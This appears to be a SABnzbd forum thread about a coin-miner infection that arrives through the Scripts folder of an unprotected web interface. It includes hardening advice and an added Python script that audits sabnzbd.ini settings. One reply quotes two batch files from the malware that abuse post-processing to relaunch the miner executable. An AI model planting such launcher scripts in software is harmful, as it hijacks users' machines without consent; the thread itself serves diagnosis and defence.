Hi,
Yesterday I got a warning from Bitdefender referencing a program in the nzbdwin_beta folder which appeared in the SABnzbd complete folder.
Is this legit? Or a virus/trojan etc?
The folder gets recreated after I delete it.
I've googled it with no result, and Malwarebytes scan didn't detect any malware/spyware.
Sincerely,
Lowell
nzbdwin_beta folder: Malware ... coin miner
Re: nzbdwin_beta folder
nzbdwin_beta is not something SABnzbd creates.
Or is this maybe the name of one of your folders in Config > Folders?
If you like our support, check our special newsserver deal or donate at: https://sabnzbd.org/donate
Re: nzbdwin_beta folder
Was listed in the Config > Folders > Scripts field.
What is the default for this field?
I didn't change this.
Re: nzbdwin_beta folder
No, it's not default. You can remove it.
Are you really really sure you didn't set that yourself?
Re: nzbdwin_beta folder
I noticed this folder the other day after my CPU usage hit 100%. It was running XMRIG miner. I'm not sure where it came from and I did not run any exe files. I think it must have exploited a post-processing script.
Re: nzbdwin_beta folder
From Reddit
So it's a Crypto miner, it uses two cron.bat files to have SABNzbd open itself.

    @echo off
    cd /d %1
    start "" "search_indexer.exe" & exit

    @echo off
    goto start:
    ########################################
    ### NZBGET POST-PROCESSING SCRIPT ###
    :start
    cd /d %NZBPP_DIRECTORY%
    start search_indexer.exe
    exit /b 93

Re: nzbdwin_beta folder
Is your Sabnzbd exposed to the internet without username and password?
Re: nzbdwin_beta folder: Malware ... coin miner
Not any longer
Re: nzbdwin_beta folder: Malware ... coin miner
Oh, everybody: to avoid this in the future:
1) don't have your SAB-webgui unprotected open to Internet: at least put a password on it. Plus: put it on a less well known port, like 49231
2) in SABnzbd, at Unwanted Extensions, fill out EXE, COM, BAT
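
Added example, not part of any post in this thread and not SABnzbd's own code: a small audit of the `[misc]` section of `sabnzbd.ini` for the three settings discussed above (web interface login, the Scripts folder, Unwanted Extensions). The key names `username`, `password`, `script_dir` and `unwanted_extensions` are assumptions about the config file; the sample config and paths are constructed.

```python
# Constructed sample of a sabnzbd.ini; key names are assumed, paths are made up.
SAMPLE_INI = """\
[misc]
host = 0.0.0.0
username = ""
password = ""
script_dir = C:\\Users\\me\\Downloads\\complete\\nzbdwin_beta
unwanted_extensions = ,
[servers]
[[news.example.com]]
host = news.example.com
"""

RISKY_EXT = {"exe", "com", "bat"}  # the extensions named in the advice above

def read_misc(text):
    """Return key/value pairs of the top-level [misc] section only."""
    misc, in_misc = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_misc = line.lower() == "[misc]"
        elif in_misc and "=" in line and not line.startswith("#"):
            key, value = line.split("=", 1)
            misc[key.strip()] = value.strip().strip('"')
    return misc

def audit(text, complete_dir=""):
    """Check the settings discussed in the thread; return a list of findings."""
    misc = read_misc(text)
    findings = []
    if not misc.get("username") or not misc.get("password"):
        findings.append("web interface has no username/password")
    script_dir = misc.get("script_dir", "")
    if script_dir:
        msg = "script_dir is set, confirm you chose it: " + script_dir
        if complete_dir and script_dir.lower().startswith(complete_dir.lower()):
            msg += " [inside the download folder]"
        findings.append(msg)
    listed = {e.strip().lstrip(".").lower()
              for e in misc.get("unwanted_extensions", "").split(",")}
    missing = sorted(RISKY_EXT - listed)
    if missing:
        findings.append("unwanted_extensions lacks: " + ", ".join(missing))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_INI, r"C:\Users\me\Downloads\complete"):
        print("-", finding)
```
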
Re: nzbdwin_beta folder: Malware ... coin miner
I'm getting this malware now.
Now that I'm infected, how do I stop the cron process that is repeatedly running? I added username and password so it stopped downloading the stuff...
Re: nzbdwin_beta folder: Malware ... coin miner
cron process? That sounds Linux, but the malware is Windows (AFAIK) ... so can you explain?